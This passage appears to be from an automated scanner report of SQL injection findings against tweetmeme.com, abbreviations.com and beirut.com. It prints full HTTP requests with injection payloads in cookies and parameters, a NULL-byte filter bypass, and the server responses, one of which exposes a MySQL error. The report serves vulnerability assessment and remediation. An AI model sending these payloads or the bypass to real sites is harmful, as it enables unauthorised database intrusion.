<div class="title">

<a
...[SNIP]...

Request 2

GET /story/3831576446/google-says-removing-reader-link-in-gmail-was-a-mistake-aims-to-bring-back-monday HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c65272576'%20or%201%3d2--%20; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 2

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:44:50 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0043599605560303
X-Served-In: 0.033595085144043
X-Served-By: ded2062
Content-Length: 51426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Goo
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=technology&width=300&height=250&rand=55690960377">
   </iframe>
</div><!-- advert: technology_300x100 -->    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=technology&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=technology&advertid=384&nurl=http://dadapp.com" target="_blank">DAD&bull;app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=1211546650" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3834773149/an-open-letter-to-the-smiley-face-following-an-insult" title="An Open Letter to the Smiley Face Following an Insult">

An Open Letter to the Smiley Face Following an Insult
</a> -&nbsp;<span class="green">206&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835745639/windows-phone-7-jailbreak-devs-genuinely-excited-by-microsofts-roadmap-engadget" title="Windows Phone 7 jailbreak devs 'genuinely excited' by Microsoft's roadmap -- Engadget">

Windows Phone 7 jailbreak devs 'genuinely excited' by&hellip;
</a> -&nbsp;<span class="green">422&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

<a h
...[SNIP]...

1.46. http://tweetmeme.com/user/KDthunderup [tm_identity cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tweetmeme.com
Path:   /user/KDthunderup

Issue detail

The tm_identity cookie appears to be vulnerable to SQL injection attacks. The payloads 15946719'%20or%201%3d1--%20 and 15946719'%20or%201%3d2--%20 were each submitted in the tm_identity cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /user/KDthunderup HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe05615946719'%20or%201%3d1--%20; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:54:12 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0026209354400635
X-Served-In: 0.9899480342865
X-Served-By: ded2060
Content-Length: 27951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
KDt
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=50530586094">
   </iframe>
</div><!-- advert: home_300x100 -->    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD&bull;app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=12648635625" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my&hellip;
</a> -&nbsp;<span class="green">291&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking&hellip;
</a> -&nbsp;<span class="green">629&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">


...[SNIP]...

Request 2

GET /user/KDthunderup HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe05615946719'%20or%201%3d2--%20; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 2

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:54:14 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0022521018981934
X-Served-In: 1.078409910202
X-Served-By: ded2062
Content-Length: 27941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
KDt
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=8696083892">
   </iframe>
</div><!-- advert: home_300x100 -->    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD&bull;app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=49801665906" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my&hellip;
</a> -&nbsp;<span class="green">291&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking&hellip;
</a> -&nbsp;<span class="green">629&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">


...[SNIP]...

1.47. http://tweetmeme.com/user/RWW [__csnv cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tweetmeme.com
Path:   /user/RWW

Issue detail

The __csnv cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the __csnv cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /user/RWW HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0'%20and%201%3d1--%20; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:54:58 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0021669864654541
X-Served-In: 1.6059739589691
X-Served-By: ded2061
Content-Length: 38843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
RWW
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=91982936287">
   </iframe>
</div><!-- advert: home_300x100 -->    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD&bull;app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=55618636940" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my&hellip;
</a> -&nbsp;<span class="green">291&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking&hellip;
</a> -&nbsp;<span class="green">629&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">


...[SNIP]...

Request 2

GET /user/RWW HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0'%20and%201%3d2--%20; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 2

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:55:01 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0026979446411133
X-Served-In: 1.5601210594177
X-Served-By: ded2060
Content-Length: 38833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
RWW
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=143229935">
   </iframe>
</div><!-- advert: home_300x100 -->    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD&bull;app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=54531145923" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my&hellip;
</a> -&nbsp;<span class="green">291&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking&hellip;
</a> -&nbsp;<span class="green">629&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">


...[SNIP]...

1.48. http://tweetmeme.com/user/reiserlaw [__qca cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tweetmeme.com
Path:   /user/reiserlaw

Issue detail

The __qca cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the __qca cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /user/reiserlaw HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201'%20and%201%3d1--%20; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:59:52 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0044441223144531
X-Served-In: 1.7354860305786
X-Served-By: h04
Content-Length: 39553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
rei
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=9850663010">
   </iframe>
</div><!-- advert: home_300x100 -->    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD&bull;app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=29191093109" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my&hellip;
</a> -&nbsp;<span class="green">291&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking&hellip;
</a> -&nbsp;<span class="green">629&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">


...[SNIP]...

Request 2

GET /user/reiserlaw HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201'%20and%201%3d2--%20; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 2

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:59:55 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0019690990447998
X-Served-In: 1.5970060825348
X-Served-By: ded2059
Content-Length: 39563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
rei
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=93230269637">
   </iframe>
</div><!-- advert: home_300x100 -->    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD&bull;app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=45976943271" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my&hellip;
</a> -&nbsp;<span class="green">291&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking&hellip;
</a> -&nbsp;<span class="green">629&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">


...[SNIP]...

1.49. http://www.abbreviations.com/getsugg.aspx [ltrs parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /getsugg.aspx

Issue detail

The ltrs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ltrs parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /getsugg.aspx?ltrs=%00' HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:26:41 GMT
Connection: close
Content-Length: 222

<suggestions>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' GROUP BY ACRONYM ORDER BY ACRONYM ASC LIMIT 15' at line 1</suggestions>

Request 2

GET /getsugg.aspx?ltrs=%00'' HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:26:44 GMT
Connection: close
Content-Length: 27

<suggestions></suggestions>

1.50. http://www.beirut.com/Restaurants/Dining/314749128 [base_domain_98034c63917cb0c0c02f1b9429eaa593 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.beirut.com
Path:   /Restaurants/Dining/314749128

Issue detail

The base_domain_98034c63917cb0c0c02f1b9429eaa593 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the base_domain_98034c63917cb0c0c02f1b9429eaa593 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /Restaurants/Dining/314749128 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com%00';

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:21:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<h5>Chez Sophie, an exceptional restaurant that mixes contemporary French and Italian cuisine, along with a touch of Mediterranean inspiration.</h5>
...[SNIP]...

Request 2

GET /Restaurants/Dining/314749128 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com%00'';

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:21:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
